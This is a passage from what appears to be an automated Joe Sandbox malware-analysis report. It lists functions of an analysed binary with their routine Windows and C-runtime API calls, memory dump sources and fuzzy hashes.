                                                                                              • Instruction ID: 3aef309f9c5446598b4c79abb376d03967329702176323648b5f25ad94587e74
                                                                                              • Opcode Fuzzy Hash: 6e58d72745b45804ca889d35c4216878be907637c61d79cfee10754ca540a950
                                                                                              • Instruction Fuzzy Hash: FAE09B7550011C67CB20AB64DC05BE5779CBB093E1F004161FE58D79D1D7709D949AE0
                                                                                              Function 00100085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: a72378bf2d92baea453927f269d7eb14615989ced8657d9e9b24b3ca28d1d58a
                                                                                              • Instruction ID: e7b9ebbd1af807ab2a9a2c6865dbe6a08e6fdbc64e02bd3ca4f9b547d5497b7f
                                                                                              • Opcode Fuzzy Hash: a72378bf2d92baea453927f269d7eb14615989ced8657d9e9b24b3ca28d1d58a
                                                                                              • Instruction Fuzzy Hash: AFE0127690111C6ADB219BA4DC05FE677ACFF0D382F0444A5BA48D3144DBB49A948FB4
                                                                                              Function 00109B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00109B30
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00109B37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 07ea876a640cae5d81ce8955b9c9768aec3ca5fb54f60ac7e0de0f6467e7dedd
                                                                                              • Instruction ID: c0ced066e04ca4bc6569ccc35d841ac0a49bca525a3b863137bfbc710cee6389
                                                                                              • Opcode Fuzzy Hash: 07ea876a640cae5d81ce8955b9c9768aec3ca5fb54f60ac7e0de0f6467e7dedd
                                                                                              • Instruction Fuzzy Hash: C8E0ED71901218EBCB14DF99E501A99B7E8EB04321F10C45FECD593241E7B16E149B91
                                                                                              Function 0011215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0011329A: try_get_function.LIBVCRUNTIME ref: 001132AF
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0011217A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00112185
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                              • String ID:
                                                                                              • API String ID: 806969131-0
                                                                                              • Opcode ID: 30fe04b2eb4ed8311ad281dcdb24acb2703c0828171894b9b2a3194c75121a92
                                                                                              • Instruction ID: 04dc80910f54327422672dedd7a1bd2e4c8fa3252158dda0c786bb0fc762a9c3
                                                                                              • Opcode Fuzzy Hash: 30fe04b2eb4ed8311ad281dcdb24acb2703c0828171894b9b2a3194c75121a92
                                                                                              • Instruction Fuzzy Hash: 7CD0222824470234BC5CF7B02C421E82384A972BB03F00B76F730CA0D1FF7080E9A211
                                                                                              Function 0010DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DloadLock.DELAYIMP ref: 0010DC73
                                                                                              • DloadProtectSection.DELAYIMP ref: 0010DC8F
                                                                                                • Part of subcall function 0010DE67: DloadObtainSection.DELAYIMP ref: 0010DE77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Dload$Section$LockObtainProtect
                                                                                              • String ID:
                                                                                              • API String ID: 731663317-0
                                                                                              • Opcode ID: 5b469afb9c7902526d8d50ff6d0b5d412bb8c9cee753c37cae83e3124289ebbc
                                                                                              • Instruction ID: a420ca6a9842994dc560726f7dd6b224759d38aa347bd418329b253ab790672a
                                                                                              • Opcode Fuzzy Hash: 5b469afb9c7902526d8d50ff6d0b5d412bb8c9cee753c37cae83e3124289ebbc
                                                                                              • Instruction Fuzzy Hash: FAD0C9741003019ED227ABE4BA8A71C6270BB19789F640689B5858A8E0DBF448D2C615
                                                                                              Function 000F12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: fc73b237274e0ade38b1346c538c482c3471ca34401aee82e794a8c8e64831a5
                                                                                              • Instruction ID: 9320fb2f33159a0a619f89d7d17e381813686c144e584c72270be6ad59b037f6
                                                                                              • Opcode Fuzzy Hash: fc73b237274e0ade38b1346c538c482c3471ca34401aee82e794a8c8e64831a5
                                                                                              • Instruction Fuzzy Hash: ACC01233058600FECB010BB0DC09D2FBBA8ABA6212F05C908F2A5C0860C638C090DB11
                                                                                              Function 000F19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 46e56505877bc68313dc01771afcc57c9ba02c7c82a9fb7987d727de447d9d7a
                                                                                              • Instruction ID: e64b51adac8fed2ec7b31dc5efc2c542b7453e20809ba445a278d69230a29ea9
                                                                                              • Opcode Fuzzy Hash: 46e56505877bc68313dc01771afcc57c9ba02c7c82a9fb7987d727de447d9d7a
                                                                                              • Instruction Fuzzy Hash: 3AC1A130A04248DFEF65CF68C494BF97BE5AF06310F0840B9DE45DBA86DB359944EBA1
                                                                                              Function 000F3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 30a6decba33f549b2fbbf70851c41b3c860f6f45b575cf47757fecd4971c41c9
                                                                                              • Instruction ID: 27d983e99f7cca6804bfe0e6238dfc992f03febeabbd517941ebe859da1b53c4
                                                                                              • Opcode Fuzzy Hash: 30a6decba33f549b2fbbf70851c41b3c860f6f45b575cf47757fecd4971c41c9
                                                                                              • Instruction Fuzzy Hash: 91710571504F489EDB25DB30CC51AFBB7E8AF14311F44492EE6AB47642DB326A48EF50
                                                                                              Function 000F837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F8384
                                                                                                • Part of subcall function 000F1380: __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F1380: new.LIBCMT ref: 000F13FE
                                                                                                • Part of subcall function 000F19A6: __EH_prolog.LIBCMT ref: 000F19AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8b50af9afcfa91ebda0ac98723935fd2dcabed9b7ce7a0a21f657dbfbe87c7dc
                                                                                              • Instruction ID: 02b4247cb5708b32320a6da9c4dbd19a365c7bfd45a2eb34590257a79998aac6
                                                                                              • Opcode Fuzzy Hash: 8b50af9afcfa91ebda0ac98723935fd2dcabed9b7ce7a0a21f657dbfbe87c7dc
                                                                                              • Instruction Fuzzy Hash: 1541C73184065C9ADB24DB60CC55BFA73A8AF50304F0440EAE68AA7893DF756BC8EF50
                                                                                              Function 000F1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F1E05
                                                                                                • Part of subcall function 000F3B3D: __EH_prolog.LIBCMT ref: 000F3B42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 904f4bb975c466573953ddd7d25c4e186217a6bd6dad177c85ea2be6071c46e9
                                                                                              • Instruction ID: 068e7c78790006ad9115cca85722b666e135f317208532f1c02d274b2d6c81de
                                                                                              • Opcode Fuzzy Hash: 904f4bb975c466573953ddd7d25c4e186217a6bd6dad177c85ea2be6071c46e9
                                                                                              • Instruction Fuzzy Hash: 26215A32904109EFCB25EF99D9519EEFBF6FF58300B10006DE985A7652CB365E10EB60
                                                                                              Function 0010A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0010A7C8
                                                                                                • Part of subcall function 000F1380: __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F1380: new.LIBCMT ref: 000F13FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 3c1db17848cb7e26bee44b42f90f38a646540e722834175e98cd564759392b8c
                                                                                              • Instruction ID: d5209f829bdfb59f63a7a90cbf44087feab71c2adb41032862f05ede3b3a6b22
                                                                                              • Opcode Fuzzy Hash: 3c1db17848cb7e26bee44b42f90f38a646540e722834175e98cd564759392b8c
                                                                                              • Instruction Fuzzy Hash: 33216B71C0424DEACF15DF94C9429EEBBB4BF19300F4044AEE849A7242DB756E06DBA1
                                                                                              Function 000F92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 199e73df816a810c6f9259c6e93b0f989e1f2017d4f1addf357ba0c468fe3b7d
                                                                                              • Instruction ID: 4b38a755a67103daaa952522387f3e239ec4396956cf3d0b85b0504f141f4fd0
                                                                                              • Opcode Fuzzy Hash: 199e73df816a810c6f9259c6e93b0f989e1f2017d4f1addf357ba0c468fe3b7d
                                                                                              • Instruction Fuzzy Hash: EF11A573D0052C9BCB22AFA8CD42EFDB776EF48750F054115FA04B7652CB359E10A6A1
                                                                                              Function 0011BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 001185A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00118FD3,00000001,00000364,?,00113713,00000050,?,00130EE8,00000200), ref: 001185EA
                                                                                              • _free.LIBCMT ref: 0011BBF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                                                                              • Instruction ID: 488df14b1d7294630914e03a4410b09cf59c52dd8308f6ea71daa07b53c03d3c
                                                                                              • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                                                                              • Instruction Fuzzy Hash: 6D0149722083096BE3398F65D88199AFBE9FB95330F25063DE19483680EB30A845C774
                                                                                              Function 000FAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                                                              • Instruction ID: 835993008ead19d54d4c2395ea412e78bb8c8697018e23ce63f18953329044c9
                                                                                              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                                                              • Instruction Fuzzy Hash: 6BF081B060470A9FDB70DA65C94566677E8EB12330F20891AD69AC2A80EB70D888E753
                                                                                              Function 001185A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00118FD3,00000001,00000364,?,00113713,00000050,?,00130EE8,00000200), ref: 001185EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: b2a61ed434a6f3f8fbd5cda60ef08cb3fcf98948da064986c82ef89b8b2ba77f
                                                                                              • Instruction ID: 468710ed46c5f7a483961f3f5d0b49dad86d0ba190c3f1a06bd221280fc05e46
                                                                                              • Opcode Fuzzy Hash: b2a61ed434a6f3f8fbd5cda60ef08cb3fcf98948da064986c82ef89b8b2ba77f
                                                                                              • Instruction Fuzzy Hash: 4BF0E931640635ABDB7D1E269C01BDB779EDF907A1B15C231A818E61C0CF20DDC18AF5
                                                                                              Function 000F5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F5BDC
                                                                                                • Part of subcall function 000FB07D: __EH_prolog.LIBCMT ref: 000FB082
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: f4d9b587219f8a0ae8910f942ee7b9a654817e33abcd393820c852bd7127fffe
                                                                                              • Instruction ID: a46384ce79bf202e501dea09a183bebd6a8167615bfc28cc5c6ea967e9d8d021
                                                                                              • Opcode Fuzzy Hash: f4d9b587219f8a0ae8910f942ee7b9a654817e33abcd393820c852bd7127fffe
                                                                                              • Instruction Fuzzy Hash: 8801AD30A01688DAC724F7B4C0053FDF7A49F29340F40459DA95A13693CFB01B08E662
                                                                                              Function 00118518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
